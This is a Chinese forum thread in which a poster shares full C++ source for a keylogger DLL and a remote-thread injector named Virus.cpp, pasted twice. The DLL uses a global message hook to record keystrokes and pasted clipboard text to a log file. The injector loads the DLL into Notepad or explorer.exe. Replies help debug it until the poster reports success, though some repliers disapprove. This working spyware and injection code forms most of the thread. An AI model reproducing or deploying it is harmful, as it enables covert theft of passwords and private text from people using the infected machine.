15,471
社区成员
发帖
与我相关
我的任务
分享在线程中注入dll后无法调用其回调函数的问题
该DLL在我使用普通客户程序加载后 hook的情况十分正常
但我将其注入其他进程进行调用时 根据测试 发现无法进入回调
其代码如下:
// Inject.cpp : Defines the entry point for the DLL application.
#pragma data_seg(".MyShare")
HINSTANCE hInst = NULL;
HHOOK My_Hook= NULL;
HWND hWnd = NULL;
#pragma data_seg()
LRESULT CALLBACK MyHook_Proc(int nCode,WPARAM wParam,LPARAM lParam);;
BOOL WINAPI StartHook();
void WINAPI StopHook();
BOOL WINAPI StartHook()
{
My_Hook = SetWindowsHookEx(WH_GETMESSAGE, (HOOKPROC)MyHook_Proc, hInst, NULL);
if(My_Hook != NULL)
{
return TRUE;
}
else
return FALSE;
}
void WINAPI StopHook()
{
if (My_Hook) UnhookWindowsHookEx(My_Hook);
My_Hook=NULL;
}
LRESULT CALLBACK MyHook_Proc(int nCode,WPARAM wParam,LPARAM lParam)
{
if (nCode==HC_ACTION)
{
PMSG msg=(PMSG)lParam;
if(msg->message==WM_KEYUP)
{
BOOL b_Sft=GetAsyncKeyState(VK_SHIFT)>>((sizeof(short)*8)-1);
if (GetKeyState(VK_CAPITAL))
{
b_Sft=!b_Sft;
}
BOOL b_Ctr=GetAsyncKeyState(VK_CONTROL)>>((sizeof(short)*8)-1);
FILE *fp;
fp=fopen("E:\\Log.txt","awb");
if (b_Ctr)
{
fprintf(fp,"\n[Ctrl]");
}
if(!b_Sft)
{
switch(msg->wParam)
{
//数字键
case '1':fprintf(fp,"1");break;
case '2':fprintf(fp,"2");break;
case '3':fprintf(fp,"3");break;
case '4':fprintf(fp,"4");break;
case '5':fprintf(fp,"5");break;
case '6':fprintf(fp,"6");break;
case '7':fprintf(fp,"7");break;
case '8':fprintf(fp,"8");break;
case '9':fprintf(fp,"9");break;
case '0':fprintf(fp,"0");break;
//字母键
case 'A':fprintf(fp,"a");;break;
case 'B':fprintf(fp,"b");;break;
case 'C':fprintf(fp,"c");break;
case 'D':fprintf(fp,"d");break;
case 'E':fprintf(fp,"e");break;
case 'F':fprintf(fp,"f");break;
case 'G':fprintf(fp,"g");break;
case 'H':fprintf(fp,"h");break;
case 'I':fprintf(fp,"i");break;
case 'J':fprintf(fp,"j");break;
case 'K':fprintf(fp,"k");break;
case 'L':fprintf(fp,"l");break;
case 'M':fprintf(fp,"m");break;
case 'N':fprintf(fp,"n");break;
case 'O':fprintf(fp,"o");break;
case 'P':fprintf(fp,"p");break;
case 'Q':fprintf(fp,"q");break;
case 'R':fprintf(fp,"r");break;
case 'S':fprintf(fp,"s");break;
case 'T':fprintf(fp,"t");break;
case 'U':fprintf(fp,"u");break;
case 'V':fprintf(fp,"v");break;
case 'W':fprintf(fp,"w");break;
case 'X':fprintf(fp,"x");break;
case 'Y':fprintf(fp,"y");break;
case 'Z':fprintf(fp,"z");break;
}
}
else
{
switch(msg->wParam)
{
//数字键
case '1':fprintf(fp,"!");break;
case '2':fprintf(fp,"@");break;
case '3':fprintf(fp,"#");break;
case '4':fprintf(fp,"$");break;
case '5':fprintf(fp,"%");break;
case '6':fprintf(fp,"^");break;
case '7':fprintf(fp,"&");break;
case '8':fprintf(fp,"*");break;
case '9':fprintf(fp,"(");break;
case '0':fprintf(fp,")");break;
//字母键
case 'A':fprintf(fp,"A");;break;
case 'B':fprintf(fp,"B");;break;
case 'C':fprintf(fp,"C");break;
case 'D':fprintf(fp,"D");break;
case 'E':fprintf(fp,"E");break;
case 'F':fprintf(fp,"F");break;
case 'G':fprintf(fp,"G");break;
case 'H':fprintf(fp,"H");break;
case 'I':fprintf(fp,"I");break;
case 'J':fprintf(fp,"J");break;
case 'K':fprintf(fp,"K");break;
case 'L':fprintf(fp,"L");break;
case 'M':fprintf(fp,"M");break;
case 'N':fprintf(fp,"N");break;
case 'O':fprintf(fp,"O");break;
case 'P':fprintf(fp,"P");break;
case 'Q':fprintf(fp,"Q");break;
case 'R':fprintf(fp,"R");break;
case 'S':fprintf(fp,"S");break;
case 'T':fprintf(fp,"T");break;
case 'U':fprintf(fp,"U");break;
case 'V':fprintf(fp,"V");break;
case 'W':fprintf(fp,"W");break;
case 'X':fprintf(fp,"X");break;
case 'Y':fprintf(fp,"Y");break;
case 'Z':fprintf(fp,"Z");break;
}
}
switch(msg->wParam)
{
case VK_NUMPAD1:fprintf(fp,"1");break;
case VK_NUMPAD2:fprintf(fp,"2");break;
case VK_NUMPAD3:fprintf(fp,"3");break;
case VK_NUMPAD4:fprintf(fp,"4");break;
case VK_NUMPAD5:fprintf(fp,"5");break;
case VK_NUMPAD6:fprintf(fp,"6");break;
case VK_NUMPAD7:fprintf(fp,"7");break;
case VK_NUMPAD8:fprintf(fp,"8");break;
case VK_NUMPAD9:fprintf(fp,"9");break;
case VK_NUMPAD0:fprintf(fp,"0");break;
case VK_MULTIPLY:fprintf(fp,"*");break;
case VK_ADD: fprintf(fp,"+");break;
case VK_SUBTRACT:fprintf(fp,"-");break;
case VK_DECIMAL: fprintf(fp,".");break;
case VK_DIVIDE: fprintf(fp,"/");break;
}
//其他键的处理
char KeyNameStr[50];
ZeroMemory(KeyNameStr,50);
GetKeyNameText(msg->lParam,KeyNameStr,50);
if(stricmp(KeyNameStr,"`")==0)
{
if(b_Sft)
fprintf(fp,"~");
else
fprintf(fp,"`");
}
if(stricmp(KeyNameStr,"-")==0)
{
if(b_Sft)
fprintf(fp,"_");
else
fprintf(fp,"-");
}
if(stricmp(KeyNameStr,"=")==0)
{
if(b_Sft)
fprintf(fp,"+");
else
fprintf(fp,"=");
}
if(stricmp(KeyNameStr,"[")==0)
{
if(b_Sft)
fprintf(fp,"{");
else
fprintf(fp,"[");
}
if(stricmp(KeyNameStr,"]")==0)
{
if(b_Sft)
fprintf(fp,"}");
else
fprintf(fp,"]");
}
if(stricmp(KeyNameStr,";")==0)
{
if(b_Sft)
fprintf(fp,":");
else
fprintf(fp,";");
}
if(stricmp(KeyNameStr,"'")==0)
{
if(b_Sft)
fprintf(fp,"\"");
else
fprintf(fp,"'");
}
if(stricmp(KeyNameStr,",")==0)
{
if(b_Sft)
fprintf(fp,"<");
else
fprintf(fp,",");
}
if(stricmp(KeyNameStr,".")==0)
{
if(b_Sft)
fprintf(fp,">");
else
fprintf(fp,".");
}
if(stricmp(KeyNameStr,"/")==0)
{
if(b_Sft)
fprintf(fp,"?");
else
fprintf(fp,"/");
}
if(stricmp(KeyNameStr,"\\")==0)
{
if(b_Sft)
fprintf(fp,"|");
else
fprintf(fp,"\\");
}
if(msg->wParam ==VK_BACK)
{
fprintf(fp,"[Back]");
}
//你以为用复制我就没办法吗?
if(b_Ctr)
{
if(msg->wParam=='V')
{
fprintf(fp,":");
int i;
GLOBALHANDLE hGlobal;
hGlobal=GlobalAlloc(GMEM_MOVEABLE | GMEM_ZEROINIT,255);
OpenClipboard (msg->hwnd) ;
hGlobal = GetClipboardData (CF_TEXT) ;
i=GlobalSize(hGlobal);
char* pText =new char[i] ;
LPVOID pGlobal = GlobalLock (hGlobal) ;
strcpy(pText,(char *)pGlobal);
GlobalUnlock (hGlobal) ;
CloseClipboard () ;
fprintf(fp,pText);
fprintf(fp,"\n");
delete []pText;
}
else
{
fprintf(fp,"\n");
}
}
if (msg->wParam==VK_RETURN)
{
fprintf(fp,"[Return]\n");
}
fflush(fp);
fclose(fp);
}
else
{
if ((msg->hwnd==hWnd)&&
((msg->message==WM_ENDSESSION)||(msg->message==WM_QUIT)||(msg->message==WM_CLOSE)))
{
StopHook();
}
}
}
return CallNextHookEx(My_Hook,nCode,wParam,lParam);
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
if(!My_Hook)
{
hInst=(HINSTANCE)hModule;
hWnd=GetForegroundWindow();
if(!StartHook())
{
return FALSE;
}
}
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
请高手指点
给50分
但我将其注入其他进程进行调用时 根据测试 发现无法进入回调
其代码如下:
// Inject.cpp : Defines the entry point for the DLL application.
#pragma data_seg(".MyShare")
HINSTANCE hInst = NULL;
HHOOK My_Hook= NULL;
HWND hWnd = NULL;
#pragma data_seg()
LRESULT CALLBACK MyHook_Proc(int nCode,WPARAM wParam,LPARAM lParam);;
BOOL WINAPI StartHook();
void WINAPI StopHook();
BOOL WINAPI StartHook()
{
My_Hook = SetWindowsHookEx(WH_GETMESSAGE, (HOOKPROC)MyHook_Proc, hInst, NULL);
if(My_Hook != NULL)
{
return TRUE;
}
else
return FALSE;
}
void WINAPI StopHook()
{
if (My_Hook) UnhookWindowsHookEx(My_Hook);
My_Hook=NULL;
}
LRESULT CALLBACK MyHook_Proc(int nCode,WPARAM wParam,LPARAM lParam)
{
if (nCode==HC_ACTION)
{
PMSG msg=(PMSG)lParam;
if(msg->message==WM_KEYUP)
{
BOOL b_Sft=GetAsyncKeyState(VK_SHIFT)>>((sizeof(short)*8)-1);
if (GetKeyState(VK_CAPITAL))
{
b_Sft=!b_Sft;
}
BOOL b_Ctr=GetAsyncKeyState(VK_CONTROL)>>((sizeof(short)*8)-1);
FILE *fp;
fp=fopen("E:\\Log.txt","awb");
if (b_Ctr)
{
fprintf(fp,"\n[Ctrl]");
}
if(!b_Sft)
{
switch(msg->wParam)
{
//数字键
case '1':fprintf(fp,"1");break;
case '2':fprintf(fp,"2");break;
case '3':fprintf(fp,"3");break;
case '4':fprintf(fp,"4");break;
case '5':fprintf(fp,"5");break;
case '6':fprintf(fp,"6");break;
case '7':fprintf(fp,"7");break;
case '8':fprintf(fp,"8");break;
case '9':fprintf(fp,"9");break;
case '0':fprintf(fp,"0");break;
//字母键
case 'A':fprintf(fp,"a");;break;
case 'B':fprintf(fp,"b");;break;
case 'C':fprintf(fp,"c");break;
case 'D':fprintf(fp,"d");break;
case 'E':fprintf(fp,"e");break;
case 'F':fprintf(fp,"f");break;
case 'G':fprintf(fp,"g");break;
case 'H':fprintf(fp,"h");break;
case 'I':fprintf(fp,"i");break;
case 'J':fprintf(fp,"j");break;
case 'K':fprintf(fp,"k");break;
case 'L':fprintf(fp,"l");break;
case 'M':fprintf(fp,"m");break;
case 'N':fprintf(fp,"n");break;
case 'O':fprintf(fp,"o");break;
case 'P':fprintf(fp,"p");break;
case 'Q':fprintf(fp,"q");break;
case 'R':fprintf(fp,"r");break;
case 'S':fprintf(fp,"s");break;
case 'T':fprintf(fp,"t");break;
case 'U':fprintf(fp,"u");break;
case 'V':fprintf(fp,"v");break;
case 'W':fprintf(fp,"w");break;
case 'X':fprintf(fp,"x");break;
case 'Y':fprintf(fp,"y");break;
case 'Z':fprintf(fp,"z");break;
}
}
else
{
switch(msg->wParam)
{
//数字键
case '1':fprintf(fp,"!");break;
case '2':fprintf(fp,"@");break;
case '3':fprintf(fp,"#");break;
case '4':fprintf(fp,"$");break;
case '5':fprintf(fp,"%");break;
case '6':fprintf(fp,"^");break;
case '7':fprintf(fp,"&");break;
case '8':fprintf(fp,"*");break;
case '9':fprintf(fp,"(");break;
case '0':fprintf(fp,")");break;
//字母键
case 'A':fprintf(fp,"A");;break;
case 'B':fprintf(fp,"B");;break;
case 'C':fprintf(fp,"C");break;
case 'D':fprintf(fp,"D");break;
case 'E':fprintf(fp,"E");break;
case 'F':fprintf(fp,"F");break;
case 'G':fprintf(fp,"G");break;
case 'H':fprintf(fp,"H");break;
case 'I':fprintf(fp,"I");break;
case 'J':fprintf(fp,"J");break;
case 'K':fprintf(fp,"K");break;
case 'L':fprintf(fp,"L");break;
case 'M':fprintf(fp,"M");break;
case 'N':fprintf(fp,"N");break;
case 'O':fprintf(fp,"O");break;
case 'P':fprintf(fp,"P");break;
case 'Q':fprintf(fp,"Q");break;
case 'R':fprintf(fp,"R");break;
case 'S':fprintf(fp,"S");break;
case 'T':fprintf(fp,"T");break;
case 'U':fprintf(fp,"U");break;
case 'V':fprintf(fp,"V");break;
case 'W':fprintf(fp,"W");break;
case 'X':fprintf(fp,"X");break;
case 'Y':fprintf(fp,"Y");break;
case 'Z':fprintf(fp,"Z");break;
}
}
switch(msg->wParam)
{
case VK_NUMPAD1:fprintf(fp,"1");break;
case VK_NUMPAD2:fprintf(fp,"2");break;
case VK_NUMPAD3:fprintf(fp,"3");break;
case VK_NUMPAD4:fprintf(fp,"4");break;
case VK_NUMPAD5:fprintf(fp,"5");break;
case VK_NUMPAD6:fprintf(fp,"6");break;
case VK_NUMPAD7:fprintf(fp,"7");break;
case VK_NUMPAD8:fprintf(fp,"8");break;
case VK_NUMPAD9:fprintf(fp,"9");break;
case VK_NUMPAD0:fprintf(fp,"0");break;
case VK_MULTIPLY:fprintf(fp,"*");break;
case VK_ADD: fprintf(fp,"+");break;
case VK_SUBTRACT:fprintf(fp,"-");break;
case VK_DECIMAL: fprintf(fp,".");break;
case VK_DIVIDE: fprintf(fp,"/");break;
}
//其他键的处理
char KeyNameStr[50];
ZeroMemory(KeyNameStr,50);
GetKeyNameText(msg->lParam,KeyNameStr,50);
if(stricmp(KeyNameStr,"`")==0)
{
if(b_Sft)
fprintf(fp,"~");
else
fprintf(fp,"`");
}
if(stricmp(KeyNameStr,"-")==0)
{
if(b_Sft)
fprintf(fp,"_");
else
fprintf(fp,"-");
}
if(stricmp(KeyNameStr,"=")==0)
{
if(b_Sft)
fprintf(fp,"+");
else
fprintf(fp,"=");
}
if(stricmp(KeyNameStr,"[")==0)
{
if(b_Sft)
fprintf(fp,"{");
else
fprintf(fp,"[");
}
if(stricmp(KeyNameStr,"]")==0)
{
if(b_Sft)
fprintf(fp,"}");
else
fprintf(fp,"]");
}
if(stricmp(KeyNameStr,";")==0)
{
if(b_Sft)
fprintf(fp,":");
else
fprintf(fp,";");
}
if(stricmp(KeyNameStr,"'")==0)
{
if(b_Sft)
fprintf(fp,"\"");
else
fprintf(fp,"'");
}
if(stricmp(KeyNameStr,",")==0)
{
if(b_Sft)
fprintf(fp,"<");
else
fprintf(fp,",");
}
if(stricmp(KeyNameStr,".")==0)
{
if(b_Sft)
fprintf(fp,">");
else
fprintf(fp,".");
}
if(stricmp(KeyNameStr,"/")==0)
{
if(b_Sft)
fprintf(fp,"?");
else
fprintf(fp,"/");
}
if(stricmp(KeyNameStr,"\\")==0)
{
if(b_Sft)
fprintf(fp,"|");
else
fprintf(fp,"\\");
}
if(msg->wParam ==VK_BACK)
{
fprintf(fp,"[Back]");
}
//你以为用复制我就没办法吗?
if(b_Ctr)
{
if(msg->wParam=='V')
{
fprintf(fp,":");
int i;
GLOBALHANDLE hGlobal;
hGlobal=GlobalAlloc(GMEM_MOVEABLE | GMEM_ZEROINIT,255);
OpenClipboard (msg->hwnd) ;
hGlobal = GetClipboardData (CF_TEXT) ;
i=GlobalSize(hGlobal);
char* pText =new char[i] ;
LPVOID pGlobal = GlobalLock (hGlobal) ;
strcpy(pText,(char *)pGlobal);
GlobalUnlock (hGlobal) ;
CloseClipboard () ;
fprintf(fp,pText);
fprintf(fp,"\n");
delete []pText;
}
else
{
fprintf(fp,"\n");
}
}
if (msg->wParam==VK_RETURN)
{
fprintf(fp,"[Return]\n");
}
fflush(fp);
fclose(fp);
}
else
{
if ((msg->hwnd==hWnd)&&
((msg->message==WM_ENDSESSION)||(msg->message==WM_QUIT)||(msg->message==WM_CLOSE)))
{
StopHook();
}
}
}
return CallNextHookEx(My_Hook,nCode,wParam,lParam);
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
if(!My_Hook)
{
hInst=(HINSTANCE)hModule;
hWnd=GetForegroundWindow();
if(!StartHook())
{
return FALSE;
}
}
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
请高手指点
给50分
...全文
请发表友善的回复…
发表回复
fightstop 2008-01-12
- 打赏
- 举报
郁闷 分忘加
fightstop 2008-01-12
- 打赏
- 举报
OK 结题哈 不错不错
Torch009 2008-01-12
- 打赏
- 举报
mark
内存泄漏 2008-01-04
- 打赏
- 举报
那你这样试试看..
这里先创建一个线程,然后在线程里面调用StartHook试试:
case DLL_PROCESS_ATTACH:
if(!My_Hook)
{
hInst=(HINSTANCE)hModule;
hWnd=GetForegroundWindow();
if(!StartHook())
{
return FALSE;
}
}
break;
这里先创建一个线程,然后在线程里面调用StartHook试试:
case DLL_PROCESS_ATTACH:
hThread = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)ThreadFunc,NULL,0,&dwThreadId);
break;
...
线程函数:
DWORD WINAPI ThreadFunc()
{
if(!StartHook())
{
return FALSE;
}
return TRUE;
}
fightstop 2008-01-03
- 打赏
- 举报
不过问题是 这样的话 我挂的那个程序会死掉 我想要的是死不掉又能挂上
fightstop 2008-01-03
- 打赏
- 举报
不错不错 可以成功了 不过能告诉我原因么
内存泄漏 2008-01-01
- 打赏
- 举报
在SetWindowsHookEx后面加上消息处理看看..
MSG msg;
while(GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
starwing83 2008-01-01
- 打赏
- 举报
哥们,你那些case太吓人了……CRT有几个诸如isalpha和isdigit的函数知道不?
fightstop 2008-01-01
- 打赏
- 举报
回复:superarhow
我只个学生那 做来锻炼下技术而已 没想别的
因为最近的操作系统课程设计里有个是关于屏幕取词的 感觉很有兴趣就顺便看了下HOOK的内容 然后自己写个练手呀 不用这么鄙视吧
回复:tabby
注入的是explorer.exe
我只个学生那 做来锻炼下技术而已 没想别的
因为最近的操作系统课程设计里有个是关于屏幕取词的 感觉很有兴趣就顺便看了下HOOK的内容 然后自己写个练手呀 不用这么鄙视吧
回复:tabby
注入的是explorer.exe
fightstop 2008-01-01
- 打赏
- 举报
....每一个都挂上的话 那就不需要注入了呀....
问题是我只想在一个进程上注入 然后挂全局钩子
问题是我只想在一个进程上注入 然后挂全局钩子
vincentcsdn 2007-12-29
- 打赏
- 举报
SetWindowsHookEx 换一下使用线程id方式,
枚举当今进程所有线程,每一个都挂上
枚举当今进程所有线程,每一个都挂上
sunlin7 2007-12-29
- 打赏
- 举报
看得一身冷汗,寒,闪人
superarhow 2007-12-25
- 打赏
- 举报
本来想帮看看,一看这cpp文件名就只好BS一把走了,这年头~~
内存泄漏 2007-12-25
- 打赏
- 举报
你注入的是什么进程?? 名字说出来...
fightstop 2007-12-23
- 打赏
- 举报
注入进程代码如下:
// Virus.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <cstdio>
#include <windows.h>
#include <string.h>
#include <iostream>
using namespace std;
int main(int argc, char* argv[])
{
// ===== 获得需要创建REMOTETHREAD的进程句柄 ===============================
// HWND hWnd = FindWindowW(L"Progman",L"Program Manager");
HWND hWnd = FindWindowW(L"Notepad",NULL);
DWORD ProcessId=0;
GetWindowThreadProcessId(hWnd, &ProcessId);
if (!ProcessId)
{
cout<<"无法找到进程"<<endl;
return 1;
}
int iReturnCode;
char DllFullPathName[MAX_PATH];
WCHAR LibFileName[MAX_PATH]={0};
strcpy(DllFullPathName, "E:\\MyProjects\\Inject\\Debug\\Inject.dll");
//将DLL文件全路径的ANSI码转换成UNICODE码
iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS,
DllFullPathName, strlen(DllFullPathName),
LibFileName, MAX_PATH);
if (!iReturnCode)
{
cout<<"路径为空"<<endl;
return 1;
}
HANDLE hRemoteThread, hRemoteProcess;
hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允许创建线程
PROCESS_VM_OPERATION | //允许VM操作
PROCESS_VM_WRITE, //允许VM写
FALSE, ProcessId );
if (!hRemoteProcess)
{
cout<<"进程打开失败"<<endl;
return 1;
}
int cb = (1 + lstrlenW(LibFileName)) * sizeof(WCHAR);
PWSTR LibFileRemote=NULL;
LibFileRemote= (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb, MEM_COMMIT, PAGE_READWRITE);
if (!LibFileRemote)
{
cout<<"虚拟空间分配失败"<<endl;
return 1;
}
iReturnCode = WriteProcessMemory(hRemoteProcess, LibFileRemote, (PVOID) LibFileName, cb, NULL);
if (!iReturnCode)
{
cout<<"写进程内存失败"<<endl;
return 1;
}
//计算LoadLibraryW的入口地址
PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle(TEXT("Kernel32.dll")), "LoadLibraryW");
if (!pfnStartAddr)
{
cout<<"计算入口地址失败"<<endl;
return 1;
}
//启动远程线程,通过远程线程调用用户的DLL文件
hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, LibFileRemote, 0, NULL);
if (!hRemoteThread)
{
cout<<"启动线程失败"<<endl;
return 1;
}
WaitForSingleObject(hRemoteThread, INFINITE);
if (LibFileRemote != NULL)
{
VirtualFreeEx(hRemoteProcess, LibFileRemote, 0, MEM_RELEASE);
}
if (hRemoteThread != NULL)
{
CloseHandle(hRemoteThread );
}
if (hRemoteProcess!= NULL)
{
CloseHandle(hRemoteProcess);
}
return 0;
}
// Virus.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <cstdio>
#include <windows.h>
#include <string.h>
#include <iostream>
using namespace std;
int main(int argc, char* argv[])
{
// ===== 获得需要创建REMOTETHREAD的进程句柄 ===============================
// HWND hWnd = FindWindowW(L"Progman",L"Program Manager");
HWND hWnd = FindWindowW(L"Notepad",NULL);
DWORD ProcessId=0;
GetWindowThreadProcessId(hWnd, &ProcessId);
if (!ProcessId)
{
cout<<"无法找到进程"<<endl;
return 1;
}
int iReturnCode;
char DllFullPathName[MAX_PATH];
WCHAR LibFileName[MAX_PATH]={0};
strcpy(DllFullPathName, "E:\\MyProjects\\Inject\\Debug\\Inject.dll");
//将DLL文件全路径的ANSI码转换成UNICODE码
iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS,
DllFullPathName, strlen(DllFullPathName),
LibFileName, MAX_PATH);
if (!iReturnCode)
{
cout<<"路径为空"<<endl;
return 1;
}
HANDLE hRemoteThread, hRemoteProcess;
hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允许创建线程
PROCESS_VM_OPERATION | //允许VM操作
PROCESS_VM_WRITE, //允许VM写
FALSE, ProcessId );
if (!hRemoteProcess)
{
cout<<"进程打开失败"<<endl;
return 1;
}
int cb = (1 + lstrlenW(LibFileName)) * sizeof(WCHAR);
PWSTR LibFileRemote=NULL;
LibFileRemote= (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb, MEM_COMMIT, PAGE_READWRITE);
if (!LibFileRemote)
{
cout<<"虚拟空间分配失败"<<endl;
return 1;
}
iReturnCode = WriteProcessMemory(hRemoteProcess, LibFileRemote, (PVOID) LibFileName, cb, NULL);
if (!iReturnCode)
{
cout<<"写进程内存失败"<<endl;
return 1;
}
//计算LoadLibraryW的入口地址
PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle(TEXT("Kernel32.dll")), "LoadLibraryW");
if (!pfnStartAddr)
{
cout<<"计算入口地址失败"<<endl;
return 1;
}
//启动远程线程,通过远程线程调用用户的DLL文件
hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, LibFileRemote, 0, NULL);
if (!hRemoteThread)
{
cout<<"启动线程失败"<<endl;
return 1;
}
WaitForSingleObject(hRemoteThread, INFINITE);
if (LibFileRemote != NULL)
{
VirtualFreeEx(hRemoteProcess, LibFileRemote, 0, MEM_RELEASE);
}
if (hRemoteThread != NULL)
{
CloseHandle(hRemoteThread );
}
if (hRemoteProcess!= NULL)
{
CloseHandle(hRemoteProcess);
}
return 0;
}
fightstop 2007-12-23
- 打赏
- 举报
注入到另一个进程后 另一个进程应该加载这个DLL 这个DLL里的回调函数应该开始执行的呀
UDX协议 2007-12-23
- 打赏
- 举报
不在一个进程,你回调啥?
